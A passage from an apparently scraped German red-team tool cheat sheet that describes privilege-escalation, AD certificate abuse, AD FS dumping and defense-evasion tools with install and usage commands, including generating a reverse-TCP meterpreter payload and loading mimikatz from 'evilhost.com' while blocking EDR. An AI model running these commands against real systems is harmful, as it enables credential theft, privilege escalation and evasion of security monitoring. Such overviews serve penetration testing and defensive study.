Certify kann dann in einem PowerShell-Skript mit folgendem geladen werden (wobei "aa..." durch den base64-kodierten Certify-Assembly-String ersetzt wird):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
Die Main()-Methode und alle Argumente können dann wie folgt aufgerufen werden:```
[Certify.Program]::Main("find /vulnerable".Split())

Vollständige Kompilieranweisungen finden Sie hier.

Verwendung:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
Ein vollständiges Beispiel-Walkthrough finden Sie [hier](https://github.com/GhostPack/Certify#example-walkthrough).

![image](https://assets.kitploit.com/production/public/readmes/147/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword ist ein PowerShell-Skript, das Teil des PowerSploit-Toolkits ist. Es wurde entwickelt, um Passwörter für lokale Konten abzurufen, die mithilfe von Gruppenrichtlinienpräferenzen (GPP) erstellt und verwaltet werden.

Get-GPPPassword durchsucht den SYSVOL-Ordner auf dem Domänencontroller nach GPP-Dateien, die Passwortinformationen enthalten. Sobald es diese Dateien findet, entschlüsselt es die Passwortinformationen und zeigt sie dem Benutzer an.

**Installation:**

Folgen Sie den PowerSploit [Installationsanweisungen](https://github.com/A-poc/RedTeam-Tools#powersploit) von diesem Tool-Blatt.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

Verwendung:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

PowerShell-Skript zum schnellen Auffinden fehlender Software-Patches für lokale Privilegienausweitungs-Schwachstellen.

*Unterstützt:*

- MS10-015 : User Mode to Ring (KiTrap0D)
- MS10-092 : Task Scheduler
- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
- MS13-081 : TrackPopupMenuEx Win32k NULL Page
- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Font Driver Buffer Overflow
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Secondary Logon Handle
- MS16-034 : Windows Kernel-Mode Drivers EoP
- MS16-135 : Win32k Elevation of Privilege
- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Privilegienausweitung

**Installation: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Verwendung: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

*Bild verwendet von https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watson ist ein .NET-Tool, das entwickelt wurde, um fehlende KBs aufzulisten und Exploits für Privilege Escalation-Schwachstellen vorzuschlagen.

Hervorragend geeignet, um fehlende Patches zu identifizieren und Exploits vorzuschlagen, die verwendet werden könnten, um bekannte Schwachstellen auszunutzen und so höhere Berechtigungen auf dem System zu erlangen.

**Installation:**

Verwenden Sie die [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Öffnen Sie die [Watson-Projektmappe .sln](https://github.com/rasta-mouse/Watson), wählen Sie "Release" und erstellen Sie sie.

**Verwendung:**```bash
# Run all checks
Watson.exe

image

Bildtext verwendet von https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

Ein auf C# basierendes Tool, das den Prozess der Erkennung und Ausnutzung von DLL-Hijacks in Ziel-Binärdateien automatisiert.

Die gefundenen Hijack-Pfade können während eines Engagements genutzt werden, um EDRs zu umgehen.

Installation:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • Eigene bestätigende DLLs :
    • Dies sind DLL-Dateien, die dem Tool helfen, die Bestätigung zu erhalten, ob die DLLs erfolgreich vom identifizierten Hijack-Pfad geladen wurden.
    • Kompiliert aus dem oben bereitgestellten MalDLL-Projekt (oder verwenden Sie die vorcompilierten Binärdateien, wenn Sie mir vertrauen!)
    • Der Name der 32-Bit-DLL sollte lauten: maldll32.dll
    • Der Name der 64-Bit-DLL sollte lauten: maldll64.dll
    • Installieren Sie das NuGet-Paket: PeNet -> https://www.nuget.org/packages/PeNet/ (Voraussetzung beim Kompilieren des ImpulsiveDLLHijack-Projekts)

Hinweis: Die Voraussetzungen i & ii sollten im Verzeichnis der ImpulsiveDLLHijacks.exe selbst abgelegt werden.

  • Build- und Setup-Informationen:

    • ImpulsiveDLLHijack

      • Klonen Sie das Repository in Visual Studio
      • Sobald das Projekt in Visual Studio geladen ist, gehen Sie zu "Projekt" --> "NuGet-Pakete verwalten" --> Suchen Sie nach Paketen und installieren Sie "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Bauen Sie das Projekt!
      • Die ImpulsiveDLLHijack.exe befindet sich im bin-Verzeichnis.
    • Und für die bestätigenden DLLs:

      • Klonen Sie das Repository in Visual Studio
      • Bauen Sie das Projekt mit x86 und x64
      • Benennen Sie die x86-Version in maldll32.dll und die x64-Version in maldll64.dll um
    • Setup: Kopieren Sie die bestätigenden DLLs (maldll32 & maldll64) in das ImpulsiveDLLHijack.exe-Verzeichnis und führen Sie dann ImpulsiveDLLHijack.exe aus :))

Installationsanleitung von https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Verwendung:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
Anwendungsbeispiele finden Sie [hier](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).

![image](https://assets.kitploit.com/production/public/readmes/147/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

*Bild verwendet von https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples*

### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)

Ein C#-Tool zum Auslesen aller möglichen nützlichen Daten aus AD FS.

Erstellt von Doug Bienstock [@doughsec](https://twitter.com/doughsec) während seiner Zeit bei Mandiant FireEye.

Dieses Tool ist für die Verwendung zusammen mit ADFSpoof konzipiert. ADFSdump gibt alle erforderlichen Informationen aus, um mit ADFSpoof Sicherheitstoken zu generieren.

**Anforderungen:**

- ADFSDump muss im Benutzerkontext des AD FS-Dienstkontos ausgeführt werden. Diese Informationen erhalten Sie, indem Sie eine Prozessliste auf dem AD FS-Server ausführen oder aus der Ausgabe des Cmdlets Get-ADFSProperties. Nur das AD FS-Dienstkonto verfügt über die erforderlichen Berechtigungen für den Zugriff auf die Konfigurationsdatenbank. Nicht einmal ein DA kann darauf zugreifen.
- ADFSDump geht davon aus, dass der Dienst für die Verwendung der Windows Internal Database (WID) konfiguriert ist. Obwohl es trivial wäre, einen externen SQL-Server zu unterstützen, ist diese Funktion derzeit nicht vorhanden.
- ADFSDump muss lokal auf einem AD FS-Server ausgeführt werden, NICHT auf einem AD FS-Webanwendungsproxy. Auf die WID kann nur lokal über eine Named Pipe zugegriffen werden.

**Installation: (Kompilieren)** 

ADFSDump wurde mit .NET 4.5 und Visual Studio 2017 Community Edition erstellt. Öffnen Sie einfach die Projektdatei .sln, wählen Sie "Release" und erstellen Sie es.

**Verwendung: (Flags)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog - Erkundung des Golden SAML-Angriffs gegen ADFS

image

Bild verwendet von https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

🔙BeRoot

BeRoot Project ist ein Post-Exploitation-Tool, das häufige Fehlkonfigurationen prüft, um einen Weg zur Privilegienausweitung zu finden.

Das Ziel von BeRoot ist es, nur potenzielle Privilegienausweitungsmöglichkeiten auszugeben und nicht eine Endpunktkonfigurationsbewertung.

Dieses Projekt funktioniert unter Windows, Linux und Mac OS.

Installation: (Linux)```bash git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/

root@kitploit:~
**Installation: (Windows)**

Eine vorkompilierte Version von BeRoot finden Sie [hier](https://github.com/AlessandroZ/BeRoot/releases).

**Verwendung:**```bash
# Run BeRoot
python beroot.py

# Run BeRoot with user password (If you know the password use it, you could get more results)
python beroot.py --password super_strong_password

Weitere Informationen finden Sie hier für:

  • Linux
  • Windows

image

Bild verwendet von https://github.com/AlessandroZ/BeRoot

Umgehung der Verteidigung

🔙Invoke-Obfuscation

Ein mit PowerShell v2.0+ kompatibler PowerShell-Befehls- und Skript-Obfuskator. Wenn ein Opfer-Endpoint PowerShell ausführen kann, ist dieses Tool hervorragend geeignet, um stark obfuskierte Skripte zu erstellen.

Installation:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**Verwendung:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veil ist ein Tool zur Generierung von Metasploit-Payloads, die gängige Antivirenlösungen umgehen.

Es kann zur Generierung von obfuskiertem Shellcode verwendet werden. Weitere Informationen finden Sie im offiziellen Veil-Framework-Blog.

Installation: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**Installation: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Nutzung:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
Die Ersteller von Veil haben einen netten [Blogbeitrag](https://www.veil-framework.com/veil-command-line-usage/) geschrieben, der die Verwendung weiterer Command-Line-Tools für Ordnance und Evasion erklärt.

![image](https://assets.kitploit.com/production/public/readmes/147/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

Eine Methode, um die aktiven Projektions-DLLs von EDR zu umgehen, indem die Ausführung des Einstiegspunkts verhindert wird.

**Funktionen:**

- Blockiert die Ausführung von EDR-DLL-Einstiegspunkten, wodurch das Setzen von EDR-Hooks verhindert wird.
- Patchesloser AMSI-Bypass, der für Scanner, die zur Laufzeit nach Code-Patches in Amsi.dll suchen, nicht erkennbar ist.
- Hostprozess, der durch ein implantierbares PE ersetzt wird, das von der Festplatte, per HTTP oder Named Pipe (Cobalt Strike) geladen werden kann.
- Der implantierte Prozess wird ausgeblendet, um Scanner zu umgehen, die nach ausgehöhlten Prozessen suchen.
- Befehlszeilenargumente werden gefälscht und nach der Prozesserstellung mithilfe einer heimlichen EDR-Erkennungsmethode implantiert.
- Patchesloser ETW-Bypass.
- Blockiert den Aufruf von NtProtectVirtualMemory, wenn der Aufrufer sich im Adressraum einer blockierten DLL befindet.

**Installation:** 

Nutzen Sie [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/), um die SharpBlock-Binärdatei zu kompilieren.

Öffnen Sie das SharpBlock [Projekt .sln](https://github.com/CCob/SharpBlock), wählen Sie „Release“ und erstellen Sie es.

**Verwendung:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Schöner Blogbeitrag von PenTestPartners hier.

image

Bild verwendet von https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz ist ein GUI x64-Binärobfuszierer, der verschiedene PE-Dateien verschleiern kann, darunter:

  • .exe
  • .dll
  • .sys

Einige unterstützte Obfuskationsfunktionen umfassen:

  • Obfuskation von Immediate Moves
  • Kontrollflussabflachung
  • ADD-Mutation
  • Entry-Point-Obfuskation
  • Lea-Obfuskation

Installation: (Voraussetzungen)

Installieren: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows

root@kitploit:~
**Verwendung:**

Verwendung der GUI zum Verschleiern einer Binärdatei:

1. Laden Sie eine Binärdatei, indem Sie oben links auf `file` klicken.
2. Fügen Sie Funktionen hinzu, indem Sie den `Functions`-Baum erweitern. (Sie können suchen, indem Sie den Namen in die Suchleiste oben eingeben)
3. Klicken Sie auf `compile` (**Hinweis:** *Das Verschleiern vieler Funktionen kann einige Sekunden dauern*)

![image](https://assets.kitploit.com/production/public/readmes/147/98ae60c1a4f287f33bd749166514e95f2ba9cdab72850a77025dd743ca52e32a.png)

*Bild verwendet von https://github.com/weak1337/Alcatraz*

### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)

Mangle ist ein Werkzeug, das Aspekte von kompilierten ausführbaren Dateien (.exe oder DLL) manipuliert.

Mangle kann bekannte Indikatoren für Kompromittierung (IoC) basierte Zeichenfolgen entfernen und durch zufällige Zeichen ersetzen, die Datei durch Vergrößern der Größe ändern, um EDRs zu umgehen, und Code-Signaturzertifikate von legitimen Dateien klonen.

Dadurch hilft Mangle Ladeprogrammen, On-Disk- und In-Memory-Scanner zu umgehen.

**Installation:**

Der erste Schritt ist, wie immer, das Klonen des Repos. Bevor Sie Mangle kompilieren, müssen Sie die Abhängigkeiten installieren. Führen Sie dazu die folgenden Befehle aus:```
go get github.com/Binject/debug/pe

Dann baue es.``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go

root@kitploit:~
**Verwendung:**```bash
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

Die vollständige Nutzungsinformationen finden Sie hier.

image

Image used from https://github.com/optiv/Mangle

🔙AMSI Fail

AMSI.fail ist eine großartige Website, die verwendet werden kann, um obfuskierte PowerShell-Snippets zu generieren, die AMSI für den aktuellen Prozess unterbrechen oder deaktivieren.

Die Snippets werden zufällig aus einem kleinen Pool von Techniken/Variationen ausgewählt, bevor sie obfuskiert werden. Jedes Snippet wird zur Laufzeit/auf Anfrage obfuskiert, sodass keine generierte Ausgabe die gleichen Signaturen teilt.

Nützlicher f-secure Blog, der AMSI erklärt hier.

image

Image used from http://amsi.fail/

🔙ScareCrow

ScareCrow ist ein Framework zur Erstellung von Payloads für das Side-Loading (nicht Injecting) in einen legitimen Windows-Prozess (Umgehung von Application-Whitelisting-Kontrollen).

Sobald der DLL-Lader in den Speicher geladen ist, nutzt er eine Technik, um die Hooks eines EDR aus den System-DLLs zu entfernen, die im Speicher des Prozesses laufen.

Bei der Ausführung kopiert ScareCrow die Bytes der System-DLLs, die auf der Festplatte in C:\Windows\System32\ gespeichert sind. Diese DLLs sind auf der Festplatte „sauber“ von EDR-Hooks, da sie vom System verwendet werden, um eine unveränderte Kopie in einen neuen Prozess zu laden, wenn dieser gestartet wird. Da EDRs diese Prozesse nur im Speicher hooken, bleiben sie unverändert.

Nützliche Blogs zum Erlernen der von ScareCrow verwendeten Techniken:

  • Endpoint Detection and Response: How Hackers Have Evolved
  • EDR and Blending In: How Attackers Avoid Getting Caught

Installation:

ScareCrow benötigt golang 1.16.1 oder höher, um Loader zu kompilieren.```bash

Clone

git clone https://github.com/optiv/ScareCrow cd ScareCrow

Install dependencies

go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo

Required

openssl osslsigncode mingw-w64

Build

go build ScareCrow.go

root@kitploit:~
**Verwendung:**```
Usage of ./ScareCrow:
  -I string
        Path to the raw 64-bit shellcode.
  -Loader string
        Sets the type of process that will sideload the malicious payload:
        [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
        [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
        [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
        [*] excel - Loads into a hidden Excel process using a JScript loader.
        [*] msiexec - Loads into MSIexec process using a JScript loader.
        [*] wscript - Loads into WScript process using a JScript loader. (default "binary")
  -O string
        Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -configfile string
        The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
...

Vollständige Nutzungsinformationen finden Sie hier.

image

Bild verwendet von https://github.com/optiv/ScareCrow

🔙moonwalk


Read more

Tool herunterladen
  • Metabigor OSINT-Tool ohne API
  • Gitrob GitHub-Scanner für sensible Informationen
  • gowitness Web-Screenshot-Dienstprogramm mit Chrome Headless